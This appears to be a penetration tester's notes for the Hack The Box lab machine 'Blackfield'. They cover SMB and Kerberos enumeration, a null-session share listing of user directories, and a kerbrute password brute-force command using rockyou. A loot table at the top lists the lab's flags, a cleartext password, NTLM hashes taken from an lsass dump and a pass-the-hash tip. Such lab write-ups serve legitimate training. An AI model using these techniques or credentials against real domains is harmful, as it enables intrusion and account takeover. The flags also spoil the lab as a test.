Tracker

  • User
  • root  

Loot

Proofs

FileFlag
user.txt9da7b87e4f5a8ef6109408e70aed3a56
root.txt527347b709eb3d21d3987692da239fa4

Passwords

UsernameHashCleartextNotes
support@blackfield.local #00^BlackKnightHash stolen with ASREPRoasting
administrator7f1e4ff8c6a8e6b6fcae2d9c0572cd62 (NTLM)Stolen from lsass.dmp
svc_backup9658d1d1dcd9250115e2205d9f48400dStolen from lsass.dmp. Use this hash to pass to e-winrm for user access.

Summary

Overview/Highlights

OS: Windows

OS Version:

DNS Hostname:

Domain: BLACKFIELD.local


Solution

Enumeration

Open Ports

domain on tcp/53
kerberos-sec on tcp/88
msrpc on tcp/135
ldap on tcp/389
microsoft-ds on tcp/445
ncacn_http on tcp/593
ldap on tcp/3268
http on tcp/5985
domain on udp/53

Manual Enumeration

Alright. So it doesn't look like there's any web servers or anything on this machine. It does look like LDAP/SMB/NetBIOS is running though. I'll just start trawling through these results.   The nmap scan on 445 failed because autorecon/nmap were only using smb1. I need to rescan this later?

The ldap nmap scan on tcp/389 came back with the full ldap root results. I didn't see anything super interesting off the break. Might come back to this, and try to dump more ldap information.

Kerberos server is running on tcp/88. Can I use any kerberos attacks? Impacket getNPusers etc?

Oh shit here we go. The smb scan results had some information.

   |  ~/cybersecurity/htb/boxes/10.10.10.192-blackfield/scans ······································ 19:46:50   ─╮
❯ cat smbclient.txt                                                                                                                                                         ─╯
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        profiles$       Disk
        SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available

   |  ~/cybersecurity/htb/boxes/10.10.10.192-blackfield/scans ······································ 19:48:00   ─╮
❯ cat smbmap-share-permissions.txt                                                                                                                         ─╯
[+] IP: blackfield.htb:445      Name: unknown
[+] Guest session       IP: blackfield.htb:445  Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                NO ACCESS       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share
        profiles$                                               READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share

   |  ~/cybersecurity/htb/boxes/10.10.10.192-blackfield/scans ······································ 19:48:06   ─╮
❯ cat smbmap-list-contents.txt                                                                                       ─╯
[+] IP: blackfield.htb:445      Name: unknown
[+] Guest session       IP: blackfield.htb:445  Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                NO ACCESS       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        .\IPC$\*
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    InitShutdown
        fr--r--r--                5 Sun Dec 31 19:03:58 1600    lsass
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    ntsvcs
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    scerpc
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-3a0-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    epmapper
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-1d0-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    LSM_API_service
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    eventlog
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-52c-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    TermSrv_API_service
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    Ctx_WinStation_API_service
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    atsvc
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-6e0-0
        fr--r--r--                4 Sun Dec 31 19:03:58 1600    wkssvc
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    SessEnvPublicRpc
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-25c-0
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-87c-0
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-25c-1
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    RpcProxy\49674
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    6eb9c1b06b1de82d
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    RpcProxy\593
        fr--r--r--                6 Sun Dec 31 19:03:58 1600    srvsvc
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    spoolss
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-bf4-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    netdfs
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    vgauth-service
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    W32TIME_ALT
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    tapsrv
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    ROUTER
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-254-0
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-a24-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    efsrpc
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    PSHost.132447102234299230.5372.DefaultAppDomain.powershell
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-a9c-0
        NETLOGON                                                NO ACCESS       Logon server share
        profiles$                                               READ ONLY
        .\profiles$\*
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    .
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ..
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AAlleni
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ABarteski
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ABekesz
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ABenzies
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ABiemiller
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AChampken
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ACheretei
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ACsonaki
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AHigchens
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AJaquemai
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AKlado
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AKoffenburger
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AKollolli
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AKruppe
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AKubale
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ALamerz
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AMaceldon
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AMasalunga
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ANavay
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ANesterova
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ANeusse
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AOkleshen
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    APustulka
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ARotella
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ASanwardeker
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AShadaia
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ASischo
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ASpruce
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ATakach
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ATaueg
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ATwardowski
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    audit2020
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AWangenheim
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AWorsey
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AZigmunt
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BBakajza
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BBeloucif
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BCarmitcheal
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BConsultant
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BErdossy
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BGeminski
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BLostal
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BMannise
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BNovrotsky
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BRigiero
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BSamkoses
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BZandonella
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CAcherman
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CAkbari
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CAldhowaihi
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CArgyropolous
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CDufrasne
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CGronk
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    Chiucarello
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    Chiuccariello
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CHoytal
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CKijauskas
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CKolbo
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CMakutenas
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CMorcillo
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CSchandall
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CSelters
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CTolmie
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DCecere
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DChintalapalli
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DCwilich
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DGarbatiuc
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DKemesies
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DMatuka
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DMedeme
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DMeherek
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DMetych
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DPaskalev
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DPriporov
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DRusanovskaya
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DVellela
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DVogleson
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DZwinak
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    EBoley
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    EEulau
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    EFeatherling
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    EFrixione
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    EJenorik
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    EKmilanovic
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ElKatkowsky
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    EmaCaratenuto
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    EPalislamovic
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    EPryar
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ESachhitello
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ESariotti
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ETurgano
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    EWojtila
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    FAlirezai
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    FBaldwind
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    FBroj
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    FDeblaquire
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    FDegeorgio
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    FianLaginja
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    FLasokowski
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    FPflum
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    FReffey
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    GaBelithe
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    Gareld
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    GBatowski
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    GForshalger
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    GGomane
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    GHisek
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    GMaroufkhani
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    GMerewether
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    GQuinniey
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    GRoswurm
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    GWiegard
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    HBlaziewske
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    HColantino
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    HConforto
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    HCunnally
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    HGougen
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    HKostova
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    IChristijr
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    IKoledo
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    IKotecky
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ISantosi
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JAngvall
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JBehmoiras
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JDanten
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JDjouka
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JKondziola
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JLeytushsenior
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JLuthner
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JMoorehendrickson
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JPistachio
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JScima
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JSebaali
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JShoenherr
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JShuselvt
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KAmavisca
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KAtolikian
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KBrokinn
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KCockeril
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KColtart
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KCyster
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KDorney
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KKoesno
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KLangfur
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KMahalik
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KMasloch
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KMibach
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KParvankova
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KPregnolato
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KRasmor
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KShievitz
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KSojdelius
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KTambourgi
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KVlahopoulos
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KZyballa
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LBajewsky
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LBaligand
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LBarhamand
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LBirer
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LBobelis
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LChippel
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LChoffin
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LCominelli
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LDruge
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LEzepek
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LHyungkim
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LKarabag
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LKirousis
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LKnade
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LKrioua
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LLefebvre
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LLoeradeavilez
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LMichoud
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LTindall
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LYturbe
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MArcynski
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MAthilakshmi
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MAttravanam
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MBrambini
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MHatziantoniou
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MHoerauf
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MKermarrec
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MKillberg
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MLapesh
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MMakhsous
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MMerezio
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MNaciri
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MShanmugarajah
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MSichkar
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MTemko
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MTipirneni
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MTonuri
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MVanarsdel
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    NBellibas
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    NDikoka
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    NGenevro
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    NGoddanti
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    NMrdirk
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    NPulido
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    NRonges
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    NSchepkie
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    NVanpraet
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    OBelghazi
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    OBushey
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    OHardybala
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    OLunas
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ORbabka
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PBourrat
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PBozzelle
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PBranti
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PCapperella
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PCurtz
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PDoreste
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PGegnas
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PMasulla
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PMendlinger
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PParakat
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PProvencer
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PTesik
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PVinkovich
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PVirding
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PWeinkaus
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    RBaliukonis
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    RBochare
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    RKrnjaic
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    RNemnich
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    RPoretsky
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    RStuehringer
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    RSzewczuga
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    RVallandas
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    RWeatherl
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    RWissor
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SAbdulagatov
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SAjowi
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SAlguwaihes
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SBonaparte
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SBouzane
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SChatin
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SDellabitta
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SDhodapkar
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SEulert
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SFadrigalan
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SGolds
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SGrifasi
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SGtlinas
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SHauht
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SHederian
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SHelregel
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SKrulig
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SLewrie
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SMaskil
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    Smocker
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SMoyta
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SRaustiala
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SReppond
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SSicliano
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SSilex
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SSolsbak
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    STousignaut
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    support
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    svc_backup
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SWhyte
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SWynigear
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TAwaysheh
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TBadenbach
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TCaffo
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TCassalom
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TEiselt
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TFerencdo
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TGaleazza
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TKauten
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TKnupke
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TLintlop
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TMusselli
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TOust
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TSlupka
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TStausland
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TZumpella
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    UCrofskey
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    UMarylebone
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    UPyrke
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    VBublavy
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    VButziger
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    VFuscca
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    VLitschauer
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    VMamchuk
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    VMarija
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    VOlaosun
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    VPapalouca
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    WSaldat
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    WVerzhbytska
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    WZelazny
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    XBemelen
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    XDadant
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    XDebes
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    XKonegni
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    XRykiel
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    YBleasdale
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    YHuftalin
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    YKivlen
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    YKozlicki
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    YNyirenda
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    YPredestin
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    YSeturino
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    YSkoropada
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    YVonebers
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    YZarpentine
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ZAlatti
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ZKrenselewski
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ZMalaab
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ZMiick
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ZScozzari
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ZTimofeeff
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ZWausik
        SYSVOL                                                  NO ACCESS       Logon server share

I guess I should start by seeing if there is anything interesting in the profiles shares? Scanning through the list of names one stands out, audit2020. It's the only one that doesn't match the naming conventions.

I couldn't connect to the SMB share with my standard -U % syntax. After looking at the autorecon commands.log file, I thought to try the connection with -U null% . This worked!

  \| \~/cybersecurity/htb/boxes/10.10.10.192-blackfield ············································ 19:55:03 ─╮
❯ smbclient [\\\\\\\\10.10.10.192\\\\profiles\$](file://10.10.10.192/profiles$) -U null% ─╯
\'Try \"help\" to get a list of possible commands.
smb: \\\>

Dir of audit2020 comes up empty. I don't think there is anything here. I can confirm by using the command 'recurse on' then ls.

I'll run enum4linux again, this time with the domain specified.

  \| \~/cybersecurity/htb/boxes/10.10.10.192-blackfield ············································ 20:02:07 ─╮
❯ enum4linux -a -M -l -d -w BLACKFIELD.local blackfield.htb 2\>&1 \| tee \"/home/borari/cybersecurity/htb/boxes/10.10.10.192-blackfield/scans/enum4linux.txt\"

I create a list of users from the SMB share by copying the profile$ directories, then using awk.

  \| \~/cybersecurity/htb/boxes/10.10.10.192-blackfield/scans ······································ 20:07:52 ─╮
❯ cat ../users.txt | awk -F '2020    ' '{print $2}' > users.list

Now I can try to kerbrute the list of users.

  \| \~/cybersecurity/htb/boxes/10.10.10.192-blackfield ············································ 20:22:26 ─╮
❯ kerbrute -dc-ip 10.10.10.192 -domain blackfield.local -users users.list -passwords /usr/share/wordlists/rockyou.utf8.txt -outputfile blackfield_kerbcreds.txt
Impacket v0.9.22.dev1+20200909.150738.15f3df26 - Copyright 2020 SecureAuth Corporation

